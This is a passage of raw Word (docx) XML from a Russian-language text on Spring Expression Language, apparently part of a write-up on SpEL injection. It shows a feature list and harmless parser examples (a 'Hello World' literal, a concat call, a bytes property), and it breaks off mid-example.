    <w:p w14:paraId="7E7876C1" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>регулярные выражения</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F5601" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>доступ к свойствам, массивам, спискам, картам</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1673DC" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>вызов метода</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7878D5B5" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>операторы отношения</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7937C" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>присвоение</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E897545" w14:textId="38BB41A5" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>вызов конструкторов</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C111A" w14:textId="364DE549" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="005F3A59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>тернарный оператор</w:t>
      </w:r>
      <w:r w:rsidR="0013017F" w:rsidRPr="0013017F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C36DCD3" w14:textId="648D7DC3" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Типичные примеры реализации уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B2E0D" w14:textId="08F683C3" w:rsidR="00F55ECD" w:rsidRDefault="00F55ECD" w:rsidP="00F55ECD">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F55ECD">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>В следующем коде представлен API SpEL для оценки буквального строкового выражения «Hello World».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD1BBF" w14:textId="77777777" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017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Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ExpressionParser parser = </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SpelExpressionParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAE65D3" w14:textId="77777777" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017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Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expression exp = parser.parseExpression(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Hello World'</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398517A9" w14:textId="77777777" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017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Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String message = (String) exp.getValue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742986FC" w14:textId="77777777" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="00F55ECD">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AC115D" w14:textId="69D33C6A" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>Значение переменной сообщения - просто «</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hello</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>World</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>».</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1FA101" w14:textId="75871C4A" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Классы и интерфейсы </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve">находятся в пакетах </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>springframework</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expression</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> и его подпакетах и </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spel</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>support</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB2FED" w14:textId="00B9A85E" w:rsidR="00F55ECD" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Интерфейс </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExpressionParser</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> отвечает за синтаксический анализ строки выражения. В этом примере строка выражения — это строковый литерал, обозначенный окружающими одинарными кавычками. Интерфейс </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expression</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> отвечает за оценку ранее определенной строки выражения. При вызове </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parseExpression</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getValue</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> могут возникать два исключения: </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParseException</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EvaluationException</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответственно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A1073" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>SpEL поддерживает широкий спектр функций, таких как вызов методов, доступ к свойствам и вызов конструкторов.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7CD5D1" w14:textId="1F71BE31" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>В качестве примера вызова метода мы вызываем метод concat для строкового литерала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F81DD"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13017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ExpressionParser parser = </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SpelExpressionParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395B2BB"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Style w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expression exp = parser.parseExpression(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Hello World'.concat('!')</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F699A9"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13017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String message = (String) exp.getValue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF67F3" w14:textId="49739CAF" w:rsidR="00F55ECD" w:rsidRPr="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="851" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8B37C3" w14:textId="57BEF305" w:rsidR="0013017F" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>Теперь значение сообщения - «</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hello</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>World</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>!».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EC362" w14:textId="6DE7268D" w:rsidR="00F55ECD" w:rsidRPr="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve">В качестве примера вызова свойства </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaBean</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно вызвать свойство </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFDFF"/>
        </w:rPr>
        <w:t>, как показано ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B69D8A"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13017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ExpressionParser parser = </w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SpelExpressionParser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C6B17F"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p>
    <w:p w14:paraId="0F93FA01"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13017F">
        <w:rPr>
          <w:rStyle w:val="hl-comment"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3F5F5F"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// invokes 'getBytes()'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEAB9ED"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expression exp = parser.parseExpression(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2A00FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Hello World'.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017F">
        <w:rPr>
          <w:rStyle w:val="hl-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
